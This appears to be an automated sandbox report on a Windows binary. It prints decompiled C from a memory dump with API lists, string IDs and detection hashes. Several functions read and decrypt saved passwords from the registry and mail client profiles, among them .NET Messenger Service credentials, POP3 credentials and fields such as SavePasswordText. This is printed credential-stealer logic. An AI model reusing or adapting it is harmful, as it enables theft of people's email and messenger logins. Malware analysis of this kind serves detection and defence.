						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                        0x00401a50
                                                                        0x00401a50
                                                                        0x00401a56
                                                                        0x00401a5c
                                                                        0x00401a61
                                                                        0x00401a63
                                                                        0x00401a65
                                                                        0x00401a69
                                                                        0x00401a6d
                                                                        0x00401a6e
                                                                        0x00401a72
                                                                        0x00401a76
                                                                        0x00401a7a
                                                                        0x00401a7e
                                                                        0x00401a82
                                                                        0x00401a86
                                                                        0x00401a8a
                                                                        0x00401a92
                                                                        0x00401a96
                                                                        0x00401a9a
                                                                        0x00401a9e
                                                                        0x00401aa4
                                                                        0x00401aa4
                                                                        0x00401aad
                                                                        0x00401ab1
                                                                        0x00401ab3
                                                                        0x00401ab3
                                                                        0x00401abd
                                                                        0x00401abf
                                                                        0x00401abf
                                                                        0x00401ac9
                                                                        0x00401acb
                                                                        0x00401acb
                                                                        0x00401ad5
                                                                        0x00401ad7
                                                                        0x00401ad7
                                                                        0x00401ae1
                                                                        0x00401ae3
                                                                        0x00401ae3
                                                                        0x00401aed
                                                                        0x00401aef
                                                                        0x00401aef
                                                                        0x00401af6
                                                                        0x00401b01
                                                                        0x00401b04
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401af8
                                                                        0x00401afb
                                                                        0x00401b06
                                                                        0x00401b06
                                                                        0x00401afd
                                                                        0x00401afd
                                                                        0x00000000
                                                                        0x00401afd
                                                                        0x00401afb
                                                                        0x00401b0c
                                                                        0x00401b20
                                                                        0x00401b26
                                                                        0x00401b48
                                                                        0x00401b48
                                                                        0x00401b28
                                                                        0x00000000
                                                                        0x00401b28
                                                                        0x00401b2a
                                                                        0x00401b3b
                                                                        0x00401b32
                                                                        0x00401b36
                                                                        0x00401b36
                                                                        0x00401b3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401b41
                                                                        0x00401b46
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401b46
                                                                        0x00401b4b
                                                                        0x00401b4b
                                                                        0x00401b4f
                                                                        0x00401b82
                                                                        0x00401b93
                                                                        0x00401b9b
                                                                        0x00401b9c
                                                                        0x00401ba4
                                                                        0x00401ba4
                                                                        0x00401baa
                                                                        0x00401bbb
                                                                        0x00401bd1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401bbd
                                                                        0x00401bc0
                                                                        0x00000000
                                                                        0x00401bc2
                                                                        0x00401bc6
                                                                        0x00401bc6
                                                                        0x00000000
                                                                        0x00401bc0
                                                                        0x00401bac
                                                                        0x00401bb0
                                                                        0x00000000
                                                                        0x00401bb0
                                                                        0x00401b9e
                                                                        0x00401b9e
                                                                        0x00000000
                                                                        0x00401b9e
                                                                        0x00401b51
                                                                        0x00401b5c
                                                                        0x00401b63
                                                                        0x00401b67
                                                                        0x00401b68
                                                                        0x00401b72
                                                                        0x00401b6a
                                                                        0x00401b6a
                                                                        0x00401b6a
                                                                        0x00401b6a
                                                                        0x00000000
                                                                        0x00401b68
                                                                        0x00401b0e
                                                                        0x00401b16
                                                                        0x00401bd3
                                                                        0x00401bd7
                                                                        0x00401bdd
                                                                        0x00401bdd
                                                                        0x00401bdd
                                                                        0x00401be1
                                                                        0x00401be2
                                                                        0x00401aa4
                                                                        0x00401bf2
                                                                        0x00401bf6
                                                                        0x00401bf7
                                                                        0x00401bf9
                                                                        0x00401bf9
                                                                        0x00401c01
                                                                        0x00401c03
                                                                        0x00401c03
                                                                        0x00401c0b
                                                                        0x00401c0d
                                                                        0x00401c0d
                                                                        0x00401c16
                                                                        0x00401c18
                                                                        0x00401c18
                                                                        0x00401c21
                                                                        0x00401c23
                                                                        0x00401c23
                                                                        0x00401c2c
                                                                        0x00401c2e
                                                                        0x00401c2e
                                                                        0x00401c37
                                                                        0x00401c83
                                                                        0x00401c89
                                                                        0x00401c8e
                                                                        0x00401c8f
                                                                        0x00401c39
                                                                        0x00401c39
                                                                        0x00401c3d
                                                                        0x00401c3e
                                                                        0x00401c3f
                                                                        0x00401c42
                                                                        0x00401c47
                                                                        0x00401c51
                                                                        0x00401c54
                                                                        0x00401c5d
                                                                        0x00401c67
                                                                        0x00401c6b
                                                                        0x00401c6f
                                                                        0x00401c75
                                                                        0x00401c7a
                                                                        0x00401c7b
                                                                        0x00401c7b
                                                                        0x00401c96

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: free$strlen
                                                                        • String ID:
                                                                        • API String ID: 667451143-3916222277
                                                                        • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                        • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                        • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                        • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                        0x0040d4a6
                                                                        0x0040d4bf
                                                                        0x0040d4cf
                                                                        0x0040d4d2
                                                                        0x0040d4d5
                                                                        0x0040d4dd
                                                                        0x0040d5c7
                                                                        0x0040d5cc
                                                                        0x0040d5d8
                                                                        0x0040d5d8
                                                                        0x0040d4e3
                                                                        0x0040d4e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040d4ed
                                                                        0x0040d4f4
                                                                        0x0040d4f7
                                                                        0x0040d56d
                                                                        0x0040d570
                                                                        0x0040d573
                                                                        0x0040d587
                                                                        0x0040d58e
                                                                        0x0040d5a7
                                                                        0x0040d5aa
                                                                        0x0040d5b2
                                                                        0x0040d5b4
                                                                        0x0040d5ba
                                                                        0x0040d5c0
                                                                        0x0040d5c0
                                                                        0x0040d5b2
                                                                        0x00000000
                                                                        0x0040d573
                                                                        0x0040d4f9
                                                                        0x0040d4ff
                                                                        0x0040d50b
                                                                        0x0040d55e
                                                                        0x0040d564
                                                                        0x0040d569
                                                                        0x00000000
                                                                        0x0040d569
                                                                        0x0040d513
                                                                        0x0040d51c
                                                                        0x0040d532
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040d537
                                                                        0x0040d546
                                                                        0x0040d54e
                                                                        0x0040d54e
                                                                        0x0040d558
                                                                        0x00000000

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040D4D5
                                                                        • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • memcpy.MSVCRT ref: 0040D546
                                                                        • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                        • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                        • API String ID: 3289975857-105384665
                                                                        • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                        • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                        • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                        • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}






















                                                                        0x0040706c
                                                                        0x00407087
                                                                        0x0040708d
                                                                        0x004070a5
                                                                        0x004070ac
                                                                        0x004070b2
                                                                        0x004070b8
                                                                        0x004070be
                                                                        0x004070c4
                                                                        0x004070cc
                                                                        0x004070ce
                                                                        0x00407199
                                                                        0x00407199
                                                                        0x004070d4
                                                                        0x004070da
                                                                        0x004070e6
                                                                        0x004070f2
                                                                        0x004070f8
                                                                        0x004070fb
                                                                        0x0040710d
                                                                        0x0040711d
                                                                        0x00407131
                                                                        0x00407138
                                                                        0x00407154
                                                                        0x0040716a
                                                                        0x0040716f
                                                                        0x00407172
                                                                        0x00407178
                                                                        0x00407188
                                                                        0x00407188
                                                                        0x0040710d
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040708D
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 00407138
                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                        • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                        • API String ID: 604216836-250559020
                                                                        • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                        • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                        • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                        • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                        0x00405e46
                                                                        0x00405e4c
                                                                        0x00405e54
                                                                        0x00405e5c
                                                                        0x00405e61
                                                                        0x00405e6b
                                                                        0x00405e73
                                                                        0x00405e75
                                                                        0x00405e75
                                                                        0x00405e73
                                                                        0x00405e91
                                                                        0x00405ec0
                                                                        0x00405e93
                                                                        0x00405e9e
                                                                        0x00405ea6
                                                                        0x00405eac
                                                                        0x00405eb0
                                                                        0x00405eb0
                                                                        0x00405eca

                                                                        APIs
                                                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                        • strlen.MSVCRT ref: 00405E96
                                                                        • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                        • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                        • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                        • String ID: Unknown Error$netmsg.dll
                                                                        • API String ID: 3198317522-572158859
                                                                        • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                        • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                        • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                        • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                        0x00403156
                                                                        0x00403160
                                                                        0x00403177
                                                                        0x00403181
                                                                        0x0040318b
                                                                        0x00403197
                                                                        0x00403199
                                                                        0x00403199
                                                                        0x004031b7
                                                                        0x004031ba
                                                                        0x004031c2
                                                                        0x004031d3
                                                                        0x004031e9
                                                                        0x00403202
                                                                        0x0040321a
                                                                        0x00403226
                                                                        0x00403234
                                                                        0x0040323b
                                                                        0x00403243
                                                                        0x00403245
                                                                        0x0040324a
                                                                        0x0040324b
                                                                        0x0040324c
                                                                        0x0040324d
                                                                        0x00403252
                                                                        0x00403255
                                                                        0x0040325d
                                                                        0x00403262
                                                                        0x0040326b
                                                                        0x0040326e
                                                                        0x00403275
                                                                        0x0040327e
                                                                        0x0040327e
                                                                        0x0040326e
                                                                        0x0040325d
                                                                        0x00403281
                                                                        0x00403281
                                                                        0x0040328e
                                                                        0x00403290
                                                                        0x00403290
                                                                        0x0040329b

                                                                        APIs
                                                                          • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                        • strchr.MSVCRT ref: 00403262
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringstrchr
                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                        • API String ID: 1348940319-1729847305
                                                                        • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                        • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                        • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                        • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 16%
                                                                        			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                        0x0040f0a2
                                                                        0x0040f0a4
                                                                        0x0040f0a6
                                                                        0x0040f0a7
                                                                        0x0040f0a7
                                                                        0x0040f0ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040f0ad
                                                                        0x0040f0ae
                                                                        0x0040f10a
                                                                        0x0040f10b
                                                                        0x0040f110
                                                                        0x0040f113
                                                                        0x0040f11a
                                                                        0x0040f11d
                                                                        0x0040f11f
                                                                        0x00000000
                                                                        0x0040f11f
                                                                        0x0040f125
                                                                        0x0040f0b5
                                                                        0x0040f0b7
                                                                        0x0040f0c3
                                                                        0x0040f0dc
                                                                        0x0040f0e9
                                                                        0x0040f102
                                                                        0x0040f117
                                                                        0x0040f119
                                                                        0x0040f104
                                                                        0x0040f104
                                                                        0x0040f105
                                                                        0x00000000
                                                                        0x0040f105
                                                                        0x0040f0eb
                                                                        0x0040f0eb
                                                                        0x0040f0ed
                                                                        0x00000000
                                                                        0x0040f0ed
                                                                        0x0040f0de
                                                                        0x0040f0de
                                                                        0x0040f0e0
                                                                        0x0040f0f2
                                                                        0x0040f0f3
                                                                        0x0040f0f8
                                                                        0x0040f0fb
                                                                        0x0040f0fb
                                                                        0x0040f0c5
                                                                        0x0040f0cd
                                                                        0x0040f0d2
                                                                        0x0040f0d5
                                                                        0x0040f0d5
                                                                        0x0040f0b9
                                                                        0x0040f0b9
                                                                        0x0040f0ba
                                                                        0x00000000
                                                                        0x0040f0ba
                                                                        0x00000000
                                                                        0x0040f0b7

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                        • API String ID: 3510742995-3273207271
                                                                        • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                        • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                        • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                        • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
